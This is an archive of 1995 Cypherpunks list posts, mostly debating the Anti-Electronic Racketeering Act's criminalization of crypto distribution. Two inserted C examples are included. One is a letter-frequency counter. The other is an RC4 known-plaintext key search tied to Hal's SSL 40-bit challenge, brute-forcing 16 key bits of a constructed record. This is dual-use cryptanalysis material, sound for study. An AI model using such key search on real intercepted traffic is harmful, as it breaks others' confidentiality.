To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <ac2b06a9060210034dbc@[144.37.6.23]>
MIME-Version: 1.0
Content-Type: text/plain


>    "Sec. 1030A.  Racketeering-related crimes involving computers
>      "(a) It shall be unlawful--
>   . . .
>         "(2) to distribute computer software that encodes or encrypts
>       electronic or digital communications to computer networks that the
>       person distributing knows, or reasonably should know, is accessible to
>       foreign nationals and foreign governments, regardless of whether such
>       software has been designated nonexportable."
>
So much for compression software, too. :-(
Pst! Anyone want a copy of gzip? PKZip? Drop*Stuff?

-- Marshall


Marshall Clow
Aladdin Systems
mclow@coyote.csusm.edu
Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfmesq@ibm.net (James F. Marshall)
Date: Thu, 13 Jul 95 14:18:17 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507132116.VAA149322@smtp-gw01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>In the subsection that explicitly mentions crypto, it says that it's
>unlawful to put (non-GAK) crypto on an open net, "regardless of 
>whether such software has been designated non-exportable". If the 
>phrase "nonexportable" means the same thing in the context of this 
>subsection, then provision (b) would only seem to apply RICO to stuff 
>that already falls under ITAR.

Pardon me if I misunderstood your point.  I haven't read the whole
bill, but I read the "regardless" phrase with a different emphasis. 
In short, that language appears to mean that one could be pounded with
RICO for uploading crypto software even if the crypto is EXPORTABLE.

The part about subsequent instances of actual access to non-exportable
crypto by foreigners, etc. appears to address a different situation --
the situation where the crypto is non-exportable.  In this different
and much more "defiant" situation, the language would allow the feds
to count predicate acts, not merely according to the actual instances
of uploading activity, but also according to the number of times the
crypto is downloaded by foreigners, etc.  Perhaps a 10,000 to 1 ratio?

It is unclear, not having read the entire bill, whether the onerous
provision in the case of non-exportable crypto would apply in the case
of exportable crypto.  Perhaps our resident federal prosecutor might
volunteer some insights into how the government might prove thousands
of predicate acts, and thus a huge pattern of racketeering activity, 
as a result of a defendant uploading non-exportable crypto once to one
site, and how the government might argue that uploading exportable 
crypto once to one known mirrored site (e.g., hobbes) would constitute
uploads to all the mirrors -- i.e., multiple predicate acts.

This email is academic speculation.  This email is not legal advice,
is not a consultation with counsel, and does not create an attorney-
client relationship.  (As a condition of entering into an attorney-
client relationship, I require a formal, ink-signed fee agreement.)

- --Jim


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAVmsEK9bzU1tDCZAQGOcAP/StGc/+/sbRCZLRJTwnhMGtda3Z7tYQ6G
QhllCCwGZ0gddwtCmH98hQaQLAbGaFyaUd4SroM3bj3/NXX2xFucnY9ogPN2LHS9
9MZ/RzBO33iVjl/F0fHAIJiCnGCkHM58Gftgtg7gyOKCs+wBkJNQgOxsuuxw2rSs
/nlYAv+ukN8=
=wCJA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 13 Jul 95 10:45:27 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Bubba
Message-ID: <ac2aa9b7090210045e71@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:19 PM 7/13/95, Robert A. Hayden wrote:

>40,000,000 acts.  Welcome to a 6x6 cell with a roommate named Bubba that
>wants to make you his wife.

Careful here, Robert!

Bubba has not yet been tried and convicted.

I admit that the allegations about Mena, drugs, Whitewater, S & Ls, and
abuse of state office are fairly serious, but he has not yet even been
formally charged.

--Tim May



..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Thu, 13 Jul 95 07:56:36 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <Pine.3.89.9507131057.A1888-0100000@l0pht>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell <frissell@panix.com> wrote:
---------------Original Message---------------
We'll just supply the feds with some of the key testing code developed for
collective cracking of RSA-129 or RC4.  That code is "a universal 
decoding device or program."  All it takes is a few years... <g>

DCF
----------End of Original Message----------

That raises an interesting issue.  How difficult to use or how time 
consuming can a program or method be to be considered "a universal 
decoding device or program."  Can I give the feds a program that will 
crack my messages in a few days when run on one of their supercomputers?
If this is not acceptable what will be their rationale?

Will they have to invent a huge new bureaucracy to manage all these 
devices and programs?  Theoretically, every person in the US could submit 
many different devices and programs.  One could bank on the feds losing 
or misplacing your program if they were inundated enough.  Can you 
destroy your only copy of the "universal decoding program" after giving 
them their copy?  Does every message or file I encrypt need a cleartext 
header that describes which of my escrowed devices or programs will decrypt 
it? 

There are many problems with this idea of Government Access to Devices or 
Programs (GADOP).  A toolset that could build many different encryption 
and decryption variations based on pseudo-random input may be a good tool 
to fight this nonsense.
 
      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM
Date: Thu, 13 Jul 95 11:03:52 PDT
To: perry@imsi.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <9507131806.AA01162@homeboy.local>
MIME-Version: 1.0
Content-Type: text/plain


>>     IANAL, but it seems to me that if I EMAIL a copy of PGP to, say, Tim
>> May, that I have just "distributed computer software .... to a computer
>> network ...accessible to foreign nationals ..." even though it was
>> "private" e-mail.
>
>Depends on how "computer network" is defined in the statute.

It's added language.  "computer network" is not defined.  Catcha' 22.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 13 Jul 95 11:07:33 PDT
To: cypherpunks@toad.com
Subject: Crisis Overload (re Electronic Racketeering)
Message-ID: <ac2aab2c0b021004b5fe@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Folks, I'm not going to exhort you to fight this latest travesty, to send
angry letters to your senators and representatives.

Every couple of months there's been a new legislative attack on what were
once basic American freedoms. (Sorry to focus on America. I'm sure you
folks in the liberty-loving paradises of, say, Germany, are gloating over
our hand-wringing.)

We're losing the war. We can send in donations to the NRA and EFF, offer
our support to the ACLU and EPIC, but the tide just keeps rolling in,
washing away our efforts. The full-time lawmakers in D.C. can proliferate
new repressive laws much faster than we can fight them.

Our focus on this list has been on crypto, and crypto is finally coming
under the massive assault we knew would come from the earliest rumblings
several years ago about "key escrow." Clipper was the warning shot, the
current "War on the Internet" (fed by scare stories and hysteria) is part
of the propaganda war, and now this bipartisan bill to expand the RICO Act
to include any non-GAK implementation of crypto is the nail in the coffin.

No wonder Stu Baker and Ron Lee were so smug at the last CFP.

Ordinary lobbying is probably a lost cause. The EFF tried to "work with"
the government (Administration, Congress) on the Digital Telephony Bill,
and got rolled (in the opinion of many, even in the governing circles of
EFF).

This latest assault is probably unstoppable. The co-sponsorship by Sen.
Leahy, once seen as an ally of the EFF (recall the attempts to get the
Leahy alternative to Exon adopted), and the enthusiastic support of
Republicans, Democrats, and the intelligence community means that GAK is
coming.

Oh, and the use of RICO and "conspiracy" in such a central way fulfills
Whit Diffie's prediction of a few years ago that the main way crypto will
be controlled is through such laws, by spreading fear, uncertainty, and
doubt amongst users and corporations. Make the corporations so paranoid
that they'll crack down on employees, adopt GAK methods, and freeze out the
"street corner user" of crypto.

(If the only users of PGP and other non-GAK tools are fringe groups and
underground communities, then the main goals will have been achieved. The
public use of PGP will have been squelched, the public use of anonymous
cash will have been suppressed, and the social control goals will have been
achieved. )

I think it's time to abandon all lobbying efforts...they don't appear to be
working, and the government is proliferating new laws faster than we can
fight them.

The only hope is to more rapidly deploy crypto, to reach the "point of no
return." Optimistically, we may already be there (the views expressed by
many of us). Pessimistically, the application of RICO laws and civil
forfeiture could put any of us who advocate crypto use and evasion of the
new laws into a precarious position.

This is enough to say for now.

Suffice it to say I view the latest Grassley proposed legislation to be the
culmination of the past several years worth of anti-liberty legislation. A
much bigger threat than Clipper.

In fact, it's what many of us saw implicit in Clipper.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Thu, 13 Jul 95 08:19:49 PDT
To: lmccarth@cs.umass.edu (L. McCarthy)
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507131212.AA21613@cs.umass.edu>
Message-ID: <9507131519.AA17335@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: lmccarth@cs.umass.edu (L. McCarthy)
   Date: Thu, 13 Jul 1995 08:12:00 -0400 (EDT)
   Reply-To: cypherpunks@toad.com (Cypherpunks Mailing List)

   bal writes:
   > It's much worse than this.  Look at the definition of "predicate act":
   > 
   >             `(b) For purposes of this section, each act of distributing
   >           software is considered a separate predicate act. Each instance in
   >           which nonexportable software is accessed by a foreign government, 
   >           an agent of a foreign government, a foreign national, or an agent 
   >           of a foreign national, shall be considered as a separate predicate
   >           act.
   > 
   > Now, since the bill also makes 1030A violations "racketeering
   > activities", all you need are two predicate acts and RICO comes into
   > play.  

   In the subsection that explicitly mentions crypto, it says that it's
   unlawful to put (non-GAK) crypto on an open net, "regardless of whether such
   software has been designated non-exportable". If the phrase "nonexportable"
   means the same thing in the context of this subsection, then provision (b)
   would only seem to apply RICO to stuff that already falls under ITAR.

What worries me is the first sentence: "each act of distributing
software is considered a predicate act."  It's not clear to me whether
this applies to (a)(1) unlicensed software or (a)(2) encryption programs
(or perhaps both).  Notice that (a)(1) says "transfer" not "distribute".
Perhaps the act of putting Alleged-RC4 on a FTP site is one act and
mailing a copy to Cypherpunks is another act.  That might be two
distributions and thus two predicate acts.

					--bal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 09:19:32 PDT
To: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507131519.AA17335@toad.com>
Message-ID: <Pine.ULT.3.91.950713111812.3076A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Brian A. LaMacchia wrote:

> What worries me is the first sentence: "each act of distributing
> software is considered a predicate act."  It's not clear to me whether
> this applies to (a)(1) unlicensed software or (a)(2) encryption programs
> (or perhaps both).  Notice that (a)(1) says "transfer" not "distribute".
> Perhaps the act of putting Alleged-RC4 on a FTP site is one act and
> mailing a copy to Cypherpunks is another act.  That might be two
> distributions and thus two predicate acts.

Of course, when you mail it to the cypherpunks list, the program goes to 
500+ people, so that's 500+ acts.  And who knows how many people connect 
to the FTP site, but everybody on the internet COULD connect, so that's 
40,000,000 acts.  Welcome to a 6x6 cell with a roommate named Bubba that 
wants to make you his wife.

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 08:35:43 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507131519.AA17335@toad.com>
Message-ID: <9507131535.AA12389@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Brian A. LaMacchia" writes:
> What worries me is the first sentence: "each act of distributing
> software is considered a predicate act."

This breakup into separate counts business is a common means of
striking terror into people. It's what gets done in the securities
industry, where if you mail a letter with an error in it to fifty
people it becomes fifty separate counts of fraud and you can go to
jail for several hundred years even with parole. I'm not making this
up.

This law would also criminalize selling crypto software -- even
emasculated crypto software -- at Egghead, by the way. Remember, even
*if the crypto software is exportable* it's a crime. It also would
criminalize the distribution of ROT-13. I'm not making either of these
things up.

I'll invoke Godwin's rule right now. The person who thought this up is
a Nazi. It's obviously not the Senator, who must be a dupe for some
national security types -- the Senator probably wouldn't know a crypto
program if it hit him on the head with a sledgehammer.  It's also
obvious that they don't think the whole thing will pass -- this is a
way of getting a "compromise" that merely outlaws all useful
encryption. "Compromise" in Washington-speak means "take down your
pants and prepare to be buggered."

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Thu, 13 Jul 95 09:03:12 PDT
To: cypherpunks@toad.com
Subject: Anti-Everything-Ever Act
Message-ID: <v02120d01ac2aaff901f4@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


Grassley's latest nonsense has got me thinking again about the rapidly
rising demonization of computers/networks/the net/etc. Remarks like...

>the wire fraud statute which has been successfully used by prosecutors for
>many use[r]s, will be amended to make fraudulent schemes which use computers
>a crime.

        ...boggle the mind, since it'd be all but impossible to commit wire
fraud _without_ involving a "computer." The obvious effect of legislation
crafted according to this kind of pseudo-thought would/will be to ensure that
there's a very firm line between, bluntly, haves and have-nots--"haves"
being those who are exempted by various legal machinations from this
ever-expanding universe of recriminalizations of the same old actions. If
Arthur commits wire fraud, he's making use of telcos' "computers" and wires
to commit fraud; is his action qualitatively different if he uses NetPhone
or Maven to accomplish exactly the same deed? If he uses a 12-yr-old
answering machine in the process, he probably isn't using a "computer" to
commit wire fraud; but if he uses a brand-new digital machine, or his kids
got him a Compaq Presario, and he uses it for voice mail--he probably _is_
using a "computer." It can't reasonably be argued that the use of newer
technology has any effect whatsoever--but it can of course be legislated.
We're seeing more and more of this addle-headed legislation coming down the
pike, and more and more of it will eventually become law: the effect, above
all, will be to make just about any use of a computer potentially quite
dangerous. For example, lying about your income on a credit card
application is, I'm told, potential bank fraud; if things continue as they
are, soon enough Mary could get slapped with yet another charge for
printing answers on her dishonest application rather than writing them by
hand. That isn't in any legislation I've seen, but how far off can it be?
        I know, I know, I'm preaching to the choir... Why? I'm going to
start working on an essay (and if the wind blows right, it'll be an op-ed)
about this hazy question--not that op-eds have much effect. :( Anyway, if
any of y'all have archived remarks by various Kongress types, pointers, dim
memories about spectacularly stupid statements, please send them my way off
list: the essay's going to focus not on legislation per se but, rather, on
the remarks that'll show how little these guys understand and how dangerous
their incomprehension is.
        Much obliged,

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Thu, 13 Jul 95 11:11:47 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: DefCon roomshare?
In-Reply-To: <199507131639.MAA07472@spl.bwh.harvard.edu>
Message-ID: <Pine.3.89.9507131226.D6155-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Adam Shostack wrote:

> 	Also, I'm looking for a (English text) letter frequency table.
> Anyone have one online?

Did you just want the letters in order of frequency, or with a numeric 
distribution per 1000?

Here's just a list, although you should be able to whip out a quick C 
program to do both fairly quickly:

etaonrishdlfcmugypwbvkxjqz
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.
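
An added example, not part of the original post: one way to write the quick C program the reply mentions, producing both the frequency order and the count per 1000 letters. The sample text in main() is constructed, and the function names are this example's own.

```c
/* Added example: English letter frequency table from a text sample.
 * Produces the letters in order of frequency and a per-1000 distribution. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Count A-Z case-insensitively into counts[0..25]; returns total letters. */
unsigned long count_letters(const char *text, unsigned long counts[26])
{
    unsigned long total = 0;
    size_t n;
    for (n = 0; n < 26; n++) counts[n] = 0;
    for (; *text != '\0'; text++) {
        unsigned char ch = (unsigned char)*text;
        if (ch < 128 && isalpha(ch)) {      /* ignore non-ASCII bytes */
            counts[tolower(ch) - 'a']++;
            total++;
        }
    }
    return total;
}

/* Fill order[] (27 bytes, NUL-terminated) with the letters sorted by
 * descending count; letters with equal counts stay in alphabetical order. */
void frequency_order(const unsigned long counts[26], char order[27])
{
    int idx[26], a, b;
    for (a = 0; a < 26; a++) idx[a] = a;
    for (a = 1; a < 26; a++) {              /* stable insertion sort */
        int cur = idx[a];
        for (b = a; b > 0 && counts[idx[b - 1]] < counts[cur]; b--)
            idx[b] = idx[b - 1];
        idx[b] = cur;
    }
    for (a = 0; a < 26; a++) order[a] = (char)('a' + idx[a]);
    order[26] = '\0';
}

/* Occurrences per 1000 letters, rounded to the nearest integer. */
unsigned long per_thousand(unsigned long count, unsigned long total)
{
    return total ? (count * 1000UL + total / 2) / total : 0;
}

int main(void)
{
    /* Constructed sample; a real table needs a much larger corpus. */
    const char *sample =
        "The quick brown fox jumps over the lazy dog while the rest of "
        "the pack sleeps in the shade of the old stone wall.";
    unsigned long counts[26], total;
    char order[27];
    int n;

    total = count_letters(sample, counts);
    frequency_order(counts, order);
    printf("order: %s\n", order);
    for (n = 0; n < 26; n++) {
        int letter = order[n] - 'a';
        printf("%c %4lu per 1000\n", order[n],
               per_thousand(counts[letter], total));
    }
    return 0;
}
```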





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 13 Jul 95 09:23:27 PDT
To: Tim Scanlon <tfs@vampire.science.gmu.edu>
Subject: Re: RACIST MILITIA: ATF
In-Reply-To: <9507131048.AA09393@vampire.science.gmu.edu>
Message-ID: <Pine.SUN.3.91.950713122034.13737A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Tim Scanlon wrote:

> I can confirm this, and a story was broadcast on the local
> ABC news affiliate (WJLA) that talked about this and Waco
> some.

Interestingly enough, WJLA is on the net (note 
http://www.access.digex.net/~wjla/wjla.html)

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 13 Jul 95 09:42:23 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: DefCon roomshare?
Message-ID: <199507131639.MAA07472@spl.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Anyone interested in sharing a room at DefCon?

	I'm fairly unobtrusive, don't smoke, and am neat enough to
live with for a few days. :)


	Also, I'm looking for a (English text) letter frequency table.
Anyone have one online?

Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 13 Jul 95 12:46:37 PDT
To: cypherpunks@toad.com
Subject: Re:  SSL RC4 challenge
Message-ID: <199507131945.MAA02875@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Hal <hfinney@shell.portal.com>
> Here is a challenge to try breaking SSL using the default exportable
> encryption mode, 40-bit RC4.
> [...]

It has been pointed out to me that I made a mistake in my analysis of the
SSL packets.  The MAC at the beginning of the encrypted packets is itself
RC4 encrypted.  That means that the 17 bytes of known plaintext start 16
bytes into the stream, not at the beginning as I thought.  This just
means that after key setup, RC4 has to be cycled 16 times before we start
comparing its output with the XOR of the known plaintext and ciphertext.

I'll produce a revision of my "challenge".  If no other mistakes are
found I'll post it to sci.crypt.

Hal
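
An added example, not part of the original post: the corrected key check described above, where RC4 is cycled 16 times after key setup before its output is compared with the XOR of known plaintext and ciphertext. It assumes a raw 5-byte RC4 key (SSL's key derivation is not modelled); the key, MAC bytes and 17-byte plaintext are constructed, and the search covers only 16 unknown key bits.

```c
/* Added example: RC4 key check against known plaintext that begins 16 bytes
 * into the keystream. Key, MAC bytes and plaintext are constructed samples. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAC_LEN   16   /* encrypted MAC at the start of the record */
#define KNOWN_LEN 17   /* known plaintext bytes that follow the MAC */
#define REC_LEN   (MAC_LEN + KNOWN_LEN)
#define KEY_LEN   5    /* 40 bits */

typedef struct { uint8_t s[256]; uint8_t i, j; } rc4_t;

static void rc4_init(rc4_t *c, const uint8_t *key, size_t keylen)
{
    unsigned k;
    uint8_t j = 0, t;
    for (k = 0; k < 256; k++) c->s[k] = (uint8_t)k;
    for (k = 0; k < 256; k++) {             /* key setup */
        j = (uint8_t)(j + c->s[k] + key[k % keylen]);
        t = c->s[k]; c->s[k] = c->s[j]; c->s[j] = t;
    }
    c->i = c->j = 0;
}

static uint8_t rc4_next(rc4_t *c)           /* one keystream byte */
{
    uint8_t t;
    c->i = (uint8_t)(c->i + 1);
    c->j = (uint8_t)(c->j + c->s[c->i]);
    t = c->s[c->i]; c->s[c->i] = c->s[c->j]; c->s[c->j] = t;
    return c->s[(uint8_t)(c->s[c->i] + c->s[c->j])];
}

void rc4_keystream(const uint8_t *key, size_t keylen, uint8_t *out, size_t n)
{
    rc4_t c;
    size_t k;
    rc4_init(&c, key, keylen);
    for (k = 0; k < n; k++) out[k] = rc4_next(&c);
}

static const uint8_t SAMPLE_KEY[KEY_LEN] = {0x13, 0x57, 0x9b, 0xdf, 0x02};
static const uint8_t KNOWN[] = "CONSTRUCTED-PLAIN";   /* 17 bytes, constructed */

/* Build a constructed record: RC4(MAC || known plaintext) under SAMPLE_KEY. */
void make_sample_record(uint8_t rec[REC_LEN])
{
    rc4_t c;
    size_t n;
    rc4_init(&c, SAMPLE_KEY, KEY_LEN);
    for (n = 0; n < MAC_LEN; n++)
        rec[n] = (uint8_t)((0xA0 + n) ^ rc4_next(&c));
    for (n = 0; n < KNOWN_LEN; n++)
        rec[MAC_LEN + n] = (uint8_t)(KNOWN[n] ^ rc4_next(&c));
}

/* Discard `skip` keystream bytes, then compare the next KNOWN_LEN bytes with
 * (ciphertext XOR known plaintext). ct_known points at the 17 ciphertext bytes
 * that cover the known plaintext. Returns 1 on a full match, else 0. */
int key_matches(const uint8_t key[KEY_LEN], const uint8_t *ct_known, size_t skip)
{
    rc4_t c;
    size_t n;
    rc4_init(&c, key, KEY_LEN);
    for (n = 0; n < skip; n++) (void)rc4_next(&c);
    for (n = 0; n < KNOWN_LEN; n++)
        if (rc4_next(&c) != (uint8_t)(ct_known[n] ^ KNOWN[n])) return 0;
    return 1;
}

/* Search only the last two key bytes (16 bits), given the first three.
 * Returns the recovered 16-bit value, or -1 if no candidate matches. */
long recover_low16(const uint8_t prefix[3], const uint8_t rec[REC_LEN])
{
    uint8_t key[KEY_LEN];
    unsigned long v;
    memcpy(key, prefix, 3);
    for (v = 0; v < 0x10000UL; v++) {
        key[3] = (uint8_t)(v >> 8);
        key[4] = (uint8_t)(v & 0xff);
        if (key_matches(key, rec + MAC_LEN, MAC_LEN)) return (long)v;
    }
    return -1;
}

int main(void)
{
    uint8_t rec[REC_LEN];
    make_sample_record(rec);
    printf("right key, no skip : %d\n", key_matches(SAMPLE_KEY, rec + MAC_LEN, 0));
    printf("right key, skip 16 : %d\n", key_matches(SAMPLE_KEY, rec + MAC_LEN, MAC_LEN));
    printf("recovered low bits : 0x%04lx\n", (unsigned long)recover_low16(SAMPLE_KEY, rec));
    return 0;
}
```

With the skip omitted, even the correct key is rejected, which is the mistake the post corrects.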




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 09:46:21 PDT
To: mclow@coyote.csusm.edu (Marshall Clow)
Subject: Re: Anti-Electronic Racketeering Act of 1995
In-Reply-To: <ac2afc0c00021003cf47@[144.37.6.21]>
Message-ID: <9507131646.AA12585@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Marshall Clow writes:
> >
> >         "(2) to distribute computer software that encodes or encrypts
> >       electronic or digital communications to computer networks that the
> >       person distributing knows, or reasonably should know, is accessible to
> >       foreign nationals and foreign governments, regardless of whether such
> >       software has been designated nonexportable."
> >
>     IANAL, but it seems to me that if I EMAIL a copy of PGP to, say, Tim
> May, that I have just "distributed computer software .... to a computer
> network ...accessible to foreign nationals ..." even though it was
> "private" e-mail.

Depends on how "computer network" is defined in the statute.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Thu, 13 Jul 95 12:51:38 PDT
To: cypherpunks@toad.com
Subject: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <B332ZVVSI9JDN*SADLER_C@SHS.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Subject: Re: Crisis Overload (re Electronic Racketeering)
Date: Thu, 13 Jul 1995 12:27:18 PDT
A1-type: DOCUMENT
Importance: normal


>On July 13, 1995, Robert Hayden said:

>Unfortunately, a system of social engineering needs to be adopted to get 
>massive use of cryptography started.  This means, and I advocated this 
>from the day I entered this forum, that programs such as PGP need to be 
>redesigned so that the a user friendly . . . so user friendly that any 
>Joe Moron can figure out not only how to use them, but also how it helps 
>them and how it is "good" for them.  This means that we need simplified 
>key management easy enough for the point-and-click masses to utilize.  
>...

>Unfortunately, all I can do is stand on the sidelines and cheer, because I 
>am not a programmer; I'm a user and a teacher.

Well put! I agree wholeheartedly! I have friends who are mostly teachers and
writers who are interested in encryption from what I've told them, but their
computer knowledge is pretty much limited to their word processors. A good
user interface would do wonders for spreading the use of PGP. Unfortunately
I am not a programmer either, but I am being motivated to become one. If
only there was more time...

Connie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alex <cp@proust.suba.com>
Date: Thu, 13 Jul 95 10:58:39 PDT
To: mclow@coyote.csusm.edu (Marshall Clow)
Subject: Re: Anti-Electronic Racketeering Act of 1995
In-Reply-To: <ac2afc0c00021003cf47@[144.37.6.21]>
Message-ID: <199507131802.NAA01316@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


>     IANAL, but it seems to me that if I EMAIL a copy of PGP to, say, Tim
> May, that I have just "distributed computer software .... to a computer
> network ...accessible to foreign nationals ..." even though it was
> "private" e-mail.

It seems to me that this bill is so broad as to be unworkable, and that
could work in our favor.  I haven't read the full text, and I'm not a
lawyer, but my reading of the excerpts posted here suggests that even stuff
that's been *approved* for export by NSA could be prohibited. 

What would be the status of stuff like NIS+ under this bill?  The 
Netscape commerce server?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Thu, 13 Jul 95 10:07:54 PDT
To: cypherpunks@toad.com
Subject: full text of the Facism bill
Message-ID: <9507131707.AA12032@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


Full text of the "Fascism In America" bill, called by its purveyors an
"anti-racketeering" bill, can be found in...

ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syl Miniter 803-768-3759 <MINITERS@Citadel.edu>
Date: Thu, 13 Jul 95 10:33:18 PDT
To: cypherpunks@toad.com
Subject: who knows about Security First Network Bank
Message-ID: <01HSTNFV105Y8Y5C1T@Citadel.edu>
MIME-Version: 1.0
Content-Type: text/plain


There is an extensive article in the July issue of "Bank Technology News" about
a startup Internet bank by the name above.
Does anyone know about this outfit?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Thu, 13 Jul 95 10:42:31 PDT
To: Marshall Clow <mclow@coyote.csusm.edu>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <ac2b06a9060210034dbc@[144.37.6.23]>
Message-ID: <Pine.A32.3.91.950713133947.3360A-100000@JAGUAR.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Marshall Clow wrote:

> >    "Sec. 1030A.  Racketeering-related crimes involving computers
> >      "(a) It shall be unlawful--
> >   . . .
> >         "(2) to distribute computer software that encodes or encrypts
> >       electronic or digital communications to computer networks that the
> >       person distributing knows, or reasonably should know, is accessible to
> >       foreign nationals and foreign governments, regardless of whether such
